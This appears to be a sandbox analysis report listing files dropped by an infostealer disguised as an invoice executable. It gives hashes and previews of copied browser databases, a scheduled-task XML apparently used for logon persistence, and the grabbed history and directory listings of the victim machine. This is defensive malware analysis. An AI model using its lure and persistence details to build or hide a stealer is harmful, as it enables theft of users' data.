MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3FC6.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3FD7.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3FF7.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3FF8.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4190.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp41B0.tmp.dat

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp532A.tmp

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1578
Entropy (8bit):	5.112390799699535
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtafxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTEv
MD5:	7FA74F7D395759B4E25D1B714955FA7B
SHA1:	E17FF96F6A88F9DB9927A129428C617EB80DDB0D
SHA-256:	BEC2EEA96CD94D06D64B1B1219719B6D2C270D0CE672FAD9C4DF61A57F0A561C
SHA-512:	DE5EE9F1E5F6BE306B8D622FBC956DC0ED4A4883D909BE855F1165D41E89E8D62895DC20C4156EF39B78786878C68977CCB838E415E0B2E2814DA2269640EE32
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmp73B2.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1578
Entropy (8bit):	5.112390799699535
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtafxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTEv
MD5:	7FA74F7D395759B4E25D1B714955FA7B
SHA1:	E17FF96F6A88F9DB9927A129428C617EB80DDB0D
SHA-256:	BEC2EEA96CD94D06D64B1B1219719B6D2C270D0CE672FAD9C4DF61A57F0A561C
SHA-512:	DE5EE9F1E5F6BE306B8D622FBC956DC0ED4A4883D909BE855F1165D41E89E8D62895DC20C4156EF39B78786878C68977CCB838E415E0B2E2814DA2269640EE32
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Browsers\Firefox\Bookmarks.txt

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	105
Entropy (8bit):	3.8863455911790052
Encrypted:	false
SSDEEP:	3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
MD5:	2E9D094DDA5CDC3CE6519F75943A4FF4
SHA1:	5D989B4AC8B699781681FE75ED9EF98191A5096C
SHA-256:	C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
SHA-512:	D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
Malicious:	false
Preview:	### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Browsers\Firefox\History.txt

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.886397362842801
Encrypted:	false
SSDEEP:	3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
MD5:	61CDD7492189720D58F6C5C975D6DFBD
SHA1:	6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
SHA-256:	2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
SHA-512:	20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
Malicious:	false
Preview:	### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Browsers\Google\History.txt

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1393
Entropy (8bit):	5.241470443395582
Encrypted:	false
SSDEEP:	24:PTIOm5oh9wxOm5pjRmZDKJfOm5pjRSpDKJfOmcTdmcOWz5oPpMcOWz5pjRVpbccU:PbmAwgm/VcDKJmm/VuDKJmmcBYpB/VVe
MD5:	7F24357FFA354F2471DED45552B897D7
SHA1:	1DC89FD89BA23EA0186D0D8559B27CF647ECF4DC
SHA-256:	573E409CB5579533BC387F3943FFFACAF7694269A38B4B56987E8A8B83CF3AD1
SHA-512:	202F2FC022B7C484E0EDCA890300C471CA3097217A20BF0DDC4E1DC277D411CA3742608302DDB2A0F4E6EAA662D1B741AC2F6A4566C3133A151D0EF83EEDB6A3
Malicious:	false
Preview:	### https://go.microsoft.com/fwlink/?linkid=851546 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 1.### https://go.microsoft.com/fwlink/?LinkId=2106243 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.microsoft.com/

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Directories\Desktop.txt

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	846
Entropy (8bit):	5.348245554535445
Encrypted:	false
SSDEEP:	24:B+7htQty0nkF1k40Ffb4gpeP1ncNCg40vSF3FQtlR5tC:B+7hKtyx3P0t4goPom06BytX54
MD5:	0CCB4C12E6A341FE854CC9603FF3018A
SHA1:	1EF8037A637BAC5E5F7F622124DBA45CAFC34049
SHA-256:	BA4A258F14E2C07CE5F7C6B1369DD2E9114837500ADC9F4A388B6C574EA4C9F8
SHA-512:	10A545EAD81A35EBEA3805825528F7A60C3B855FD69E87F6DAE09D9FB75298FB858810442FFB145A910FB1220492D263A21D7525805EDD39E58289BD2A9A6C6C
Malicious:	false
Preview:	Desktop\...DTBZGIOOSO\....DTBZGIOOSO.docx....KATAXZVCPS.mp3....ONBQCLYSPU.pdf....UMMBDNEQBN.png....VLZDGUKUTZ.jpg....XZXHAVGRAG.xlsx...DVWHKMNFNN\...HTAGVDFUIE\...JSDNGYCOWY\...NIKHQAIQAU\...ONBQCLYSPU\....KATAXZVCPS.xlsx....LTKMYBSEYZ.pdf....ONBQCLYSPU.docx....RAYHIWGKDI.mp3....YPSIACHYXW.jpg....ZBEDCJPBEY.png...SQRKHNBNYN\...WKXEWIOTXI\...XZXHAVGRAG\....DVWHKMNFNN.jpg....KATAXZVCPS.pdf....NWTVCDUMOB.png....VLZDGUKUTZ.xlsx....XZXHAVGRAG.docx....YPSIACHYXW.mp3...desktop.ini...DTBZGIOOSO.docx...DVWHKMNFNN.jpg...Excel.lnk...Invoice-BL. Payment TT $ 28,945.99.exe...KATAXZVCPS.mp3...KATAXZVCPS.pdf...KATAXZVCPS.xlsx...LTKMYBSEYZ.pdf...NWTVCDUMOB.png...ONBQCLYSPU.docx...ONBQCLYSPU.pdf...RAYHIWGKDI.mp3...UMMBDNEQBN.png...VLZDGUKUTZ.jpg...VLZDGUKUTZ.xlsx...XZXHAVGRAG.docx...XZXHAVGRAG.xlsx...YPSIACHYXW.jpg...YPSIACHYXW.mp3...ZBEDCJPBEY.png..

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Directories\Documents.txt

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	946
Entropy (8bit):	5.355361480339201
Encrypted:	false
SSDEEP:	24:n+7htQty0kxrqEEqkF1k40Ffb4gptx0cNCg40vSF3FQtlR5tC:n+7hKtytBqEEj3P0t4gZm06BytX54
MD5:	CCC44BE3136BD29B8BDD9A03AD35CF0C
SHA1:	53E6994BDBDC4A764EE745206C4F37161D5D613D
SHA-256:	B6B4F85D7F6E5516307EE37FC25E7970981B6BED39D5C357C9834F719BF7BB91
SHA-512:	A8AA7B6FADBB63A5735A9E2E97B4775ADEA692C6B990BAFE7CDE71B207BD14BF20DEDDEEDD089241E87A068BDEAFBB14B1AAE32AFBFD305A17572FA1BF124008
Malicious:	false
Preview:	Documents\...DTBZGIOOSO\....DTBZGIOOSO.docx....KATAXZVCPS.mp3....ONBQCLYSPU.pdf....UMMBDNEQBN.png....VLZDGUKUTZ.jpg....XZXHAVGRAG.xlsx...DVWHKMNFNN\...HTAGVDFUIE\...JSDNGYCOWY\...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....Saved Pictures\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...NIKHQAIQAU\...ONBQCLYSPU\....KATAXZVCPS.xlsx....LTKMYBSEYZ.pdf....ONBQCLYSPU.docx....RAYHIWGKDI.mp3....YPSIACHYXW.jpg....ZBEDCJPBEY.png...SQRKHNBNYN\...WKXEWIOTXI\...XZXHAVGRAG\....DVWHKMNFNN.jpg....KATAXZVCPS.pdf....NWTVCDUMOB.png....VLZDGUKUTZ.xlsx....XZXHAVGRAG.docx....YPSIACHYXW.mp3...desktop.ini...DTBZGIOOSO.docx...DVWHKMNFNN.jpg...KATAXZVCPS.mp3...KATAXZVCPS.pdf...KATAXZVCPS.xlsx...LTKMYBSEYZ.pdf...NWTVCDUMOB.png...ONBQCLYSPU.docx...ONBQCLYSPU.pdf...RAYHIWGKDI.mp3...UMMBDNEQBN.png...VLZDGUKUTZ.jpg...VLZDGUKUTZ.xlsx...XZXHAVGRAG.docx...XZXHAVGRAG.xlsx...YPSIACHYXW.jpg...YPSIACHYXW.mp3...ZBEDCJPBEY.png..

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Directories\Downloads.txt

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	338
Entropy (8bit):	5.272373331532227
Encrypted:	false
SSDEEP:	6:3tSLKKBZbUcx0/xmT/Esl0/5hOLXovsvM7LLFEKTFQtlRo4r9adCyaS5UUJUsrQe:QLKKBptx0/U/FC/54L4vsvWnFEKTFQtu
MD5:	DA7F715DF404D5E9980389ECD8F23716
SHA1:	A8E28EBAF2340F5458764A45107897F610075941
SHA-256:	B7C4BA1F5DB7584FB05E9EE678A0A6D132E68A659A93FE79F452FE03BFC8E5B0
SHA-512:	6DE16DD7351FBAA303E5798E2F08D319A3A5E6A9BB996273D7D61F39569A3A594B30EE629FD3902268DF239B69D87AAF42B6BCFE3A15829EA42CBCE1023BCDDA
Malicious:	false
Preview:	Downloads\...desktop.ini...DTBZGIOOSO.docx...DVWHKMNFNN.jpg...KATAXZVCPS.mp3...KATAXZVCPS.pdf...KATAXZVCPS.xlsx...LTKMYBSEYZ.pdf...NWTVCDUMOB.png...ONBQCLYSPU.docx...ONBQCLYSPU.pdf...RAYHIWGKDI.mp3...UMMBDNEQBN.png...VLZDGUKUTZ.jpg...VLZDGUKUTZ.xlsx...XZXHAVGRAG.docx...XZXHAVGRAG.xlsx...YPSIACHYXW.jpg...YPSIACHYXW.mp3...ZBEDCJPBEY.png..

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Directories\OneDrive.txt

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.023465189601646
Encrypted:	false
SSDEEP:	3:1hiR8LKB:14R8LKB
MD5:	966247EB3EE749E21597D73C4176BD52
SHA1:	1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
SHA-256:	8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
SHA-512:	BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
Malicious:	false
Preview:	OneDrive\...desktop.ini..

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Directories\Pictures.txt

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	88
Entropy (8bit):	4.450045114302317
Encrypted:	false
SSDEEP:	3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
MD5:	D430E8A326E3D75F5E49C40C111646E7
SHA1:	D8F2494185D04AB9954CD78268E65410768F6226
SHA-256:	22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
SHA-512:	1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
Malicious:	false
Preview:	Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Directories\Startup.txt

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.053508854797679
Encrypted:	false
SSDEEP:	3:jgBLKB:j4LKB
MD5:	68C93DA4981D591704CEA7B71CEBFB97
SHA1:	FD0F8D97463CD33892CC828B4AD04E03FC014FA6
SHA-256:	889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
SHA-512:	63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
Malicious:	false
Preview:	Startup\...desktop.ini..

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Directories\Temp.txt

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3866
Entropy (8bit):	5.367751672809744
Encrypted:	false
SSDEEP:	96:4jzcRPTmt6qESf4QcNdKwrbIGV5GfcitVMAUMakwq:BtbSw/NzUKhq
MD5:	43377ABE5F3FE8064CE1105D737ADFCB
SHA1:	5CF6A48556FA5D55186BE1A902BDF2A587C8EF77
SHA-256:	5F390BC8EF9CA91B0E76FADDE15AC65E293A703C4D4C4578C41780DD78D8505D
SHA-512:	8B7F5A0CCAE323AB0740C5377E5237F3E1881DC67A29FBC5EB337EC2D776985D1593F5970E57BB73B8E671896B8BB36E95AC9F5C2AD8D6E9996CFCD88973135D
Malicious:	false
Preview:	Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-00-50-743.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-01-22-078.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696334775820156800_6EB929AF-656E-4F43-9731-EA7753E1F1BD.log.....App1696334923056622400_BD966DD2-7850-423A-B1D8-7882CE1A6D15.log.....App1696417072488237400_C12D9B44-3468-47BC-9418-BF0A674A2B2F.log.....App1696417101742322600_290EFEE9-C25A-4857-9F32-D7E6D51B7C09.log.....App1696417118050662300_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App1696417118051710600_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App_1696413198165042300_AA3FCB9C-CF1A-4407-8A94-A7D6C220021F.log...Low\...mozilla-temp-files\...Symbols\....ntkrnlmp.pdb\.....68A17FAF3012B7846079AEECDBE0A5831\......download.error......ntkrnlmp.pdb....winload

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Directories\Videos.txt

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.7950885863977324
Encrypted:	false
SSDEEP:	3:k+JrLKB:k+JrLKB
MD5:	1FDDBF1169B6C75898B86E7E24BC7C1F
SHA1:	D2091060CB5191FF70EB99C0088C182E80C20F8C
SHA-256:	A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
SHA-512:	20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
Malicious:	false
Preview:	Videos\...desktop.ini..

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DTBZGIOOSO.docx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
